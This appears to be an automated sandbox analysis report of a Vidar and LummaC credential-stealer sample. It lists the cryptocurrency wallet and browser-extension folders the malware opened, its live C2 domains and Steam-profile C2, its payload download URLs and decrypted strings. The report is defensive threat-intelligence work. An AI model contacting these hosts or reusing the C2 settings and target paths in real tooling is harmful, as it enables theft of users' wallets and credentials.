Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 0000000C.00000002.2377742353.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2896, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 2.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3c15570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3c15570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2896, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2B0C40 sqlite3_bind_zeroblob,	2_2_6C2B0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2B0D60 sqlite3_bind_parameter_name,	2_2_6C2B0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1D8EA0 sqlite3_clear_bindings,	2_2_6C1D8EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2B0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	2_2_6C2B0B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1D6410 bind,WSAGetLastError,	2_2_6C1D6410

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
95.164.119.162	stadiatechnologies.com	Gibraltar	39762	VAKPoltavaUkraineUA	true
188.114.97.3	locatedblsoqp.shop	European Union	13335	CLOUDFLARENETUS	true
188.114.96.3	traineiwnqo.shop	European Union	13335	CLOUDFLARENETUS	true
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
147.45.68.138	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true

Contacted Domains

Name	IP	Active
locatedblsoqp.shop	188.114.97.3	true
awwardwiqi.shop	188.114.97.3	true
stadiatechnologies.com	95.164.119.162	true
traineiwnqo.shop	188.114.96.3	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://147.45.68.138/nss3.dll	true	Avira URL Cloud: malware	unknown
condedqpwqm.shop	true	Avira URL Cloud: phishing	unknown
http://stadiatechnologies.com/	true	Avira URL Cloud: safe	unknown
http://147.45.68.138/	true	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199761128941	true	Avira URL Cloud: malware	unknown
http://147.45.68.138/sql.dll	true	Avira URL Cloud: malware	unknown
http://147.45.68.138/softokn3.dll	true	Avira URL Cloud: malware	unknown
stagedchheiqwo.shop	true	Avira URL Cloud: phishing	unknown
https://locatedblsoqp.shop/api	true	Avira URL Cloud: phishing	unknown
stamppreewntnq.shop	true	Avira URL Cloud: phishing	unknown
evoliutwoqm.shop	true	Avira URL Cloud: safe	unknown
https://awwardwiqi.shop/api	true	Avira URL Cloud: malware	unknown
http://147.45.68.138/msvcp140.dll	true	Avira URL Cloud: malware	unknown
awwardwiqi.shop	true	Avira URL Cloud: safe	unknown
http://147.45.44.104/prog/66d0cd9a65b5d_vqwergf.exe	false	Avira URL Cloud: malware	unknown
http://147.45.68.138/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
http://147.45.44.104/prog/66d0cd8fb6f7b_lgjfd.exe	false	Avira URL Cloud: safe	unknown
http://147.45.68.138/mozglue.dll	true	Avira URL Cloud: malware	unknown
locatedblsoqp.shop	true	Avira URL Cloud: phishing	unknown
caffegclasiqwp.shop	true	Avira URL Cloud: malware	unknown
millyscroqwp.shop	true	Avira URL Cloud: malware	unknown
https://traineiwnqo.shop/api	true	Avira URL Cloud: malware	unknown
http://147.45.68.138/freebl3.dll	true	Avira URL Cloud: malware	unknown
traineiwnqo.shop	true	Avira URL Cloud: malware	unknown

AV Detection

Antivirus detection for URL or domain

Source: condedqpwqm.shop	Avira URL Cloud: Label: phishing
Source: https://steamcommunity.com/profiles/76561199761128941	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/nss3.dll	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/sql.dll	Avira URL Cloud: Label: malware
Source: https://t.me/iyigunl	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/softokn3.dll	Avira URL Cloud: Label: malware
Source: stagedchheiqwo.shop	Avira URL Cloud: Label: phishing
Source: https://locatedblsoqp.shop/api	Avira URL Cloud: Label: phishing
Source: stamppreewntnq.shop	Avira URL Cloud: Label: phishing
Source: http://147.45.68.138/msvcp140.dll	Avira URL Cloud: Label: malware
Source: https://awwardwiqi.shop/api	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66d0cd9a65b5d_vqwergf.exe	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/msvcp140.dll?	Avira URL Cloud: Label: malware
Source: https://traineiwnqo.shop/apibu	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/mozglue.dll	Avira URL Cloud: Label: malware
Source: locatedblsoqp.shop	Avira URL Cloud: Label: phishing
Source: caffegclasiqwp.shop	Avira URL Cloud: Label: malware
Source: millyscroqwp.shop	Avira URL Cloud: Label: malware
Source: https://traineiwnqo.shop/api	Avira URL Cloud: Label: malware
Source: https://traineiwnqo.shop/	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/freebl3.dll	Avira URL Cloud: Label: malware
Source: traineiwnqo.shop	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199761128941"], "Botnet": "4384b1ceb77dcf470b759bedd7bb140b"}
Source: 9.2.RegAsm.exe.400000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["traineiwnqo.shop", "caffegclasiqwp.shop", "awwardwiqi.shop", "stamppreewntnq.shop", "evoliutwoqm.shop", "millyscroqwp.shop", "condedqpwqm.shop", "locatedblsoqp.shop", "stagedchheiqwo.shop"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\KJKJJJECFI.exe	ReversingLabs: Detection: 34%
Source: C:\ProgramData\KKJEBAAECB.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd8fb6f7b_lgjfd[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd9a65b5d_vqwergf[1].exe	ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: caffegclasiqwp.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: stamppreewntnq.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: stagedchheiqwo.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: millyscroqwp.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: evoliutwoqm.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: condedqpwqm.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: traineiwnqo.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: locatedblsoqp.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: awwardwiqi.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: TeslaBrowser/5.5
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: - Screen Resoluton:
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: - Physical Installed Memory:
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: Workgroup: -
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: H8NgCl--

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00406AB6 CryptUnprotectData,LocalAlloc,LocalFree,	2_2_00406AB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040F8D5 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	2_2_0040F8D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00406A53 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	2_2_00406A53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004083FA memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,PK11_FreeSlot,lstrcatA,	2_2_004083FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	2_2_6C0D6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C22A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	2_2_6C22A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1F4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	2_2_6C1F4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C224440 PK11_PrivDecrypt,	2_2_6C224440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2244C0 PK11_PubEncrypt,	2_2_6C2244C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2725B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	2_2_6C2725B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C208670 PK11_ExportEncryptedPrivKeyInfo,	2_2_6C208670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C22A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	2_2_6C22A650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C20E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	2_2_6C20E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C24A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	2_2_6C24A730

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: c:\rje\tg\h2r2\obj\Re\ease\etf.pdb source: file.exe
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000002.00000002.2148380649.0000000035593000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000002.00000002.2142626224.00000000296BC000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2385875761.000000001DB7B000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source:	Binary string: c:\rje\tg\obj\Re\ease\etf.pdb source: KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00413540 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	2_2_00413540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040B969 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040B969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041425C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	2_2_0041425C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00413B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	2_2_00413B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409B68 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_00409B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040AB08 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040AB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409317 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_00409317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	2_2_004013B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409645 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_00409645
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040A2C1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	2_2_0040A2C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00413EA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	2_2_00413EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	12_2_004013B4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0041391C GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

2_2_0041391C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+1Ch]	9_2_0040C000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	9_2_0040B810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-14h]	9_2_0043BC78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp]	9_2_0040CC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp]	9_2_0040C69D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	9_2_00413846
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000874h]	9_2_0041E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	9_2_0041E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	9_2_0041F862
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [edx+ebx+3Ch]	9_2_0043A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	9_2_004390C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	9_2_0043E8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	9_2_0043E080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	9_2_00413888
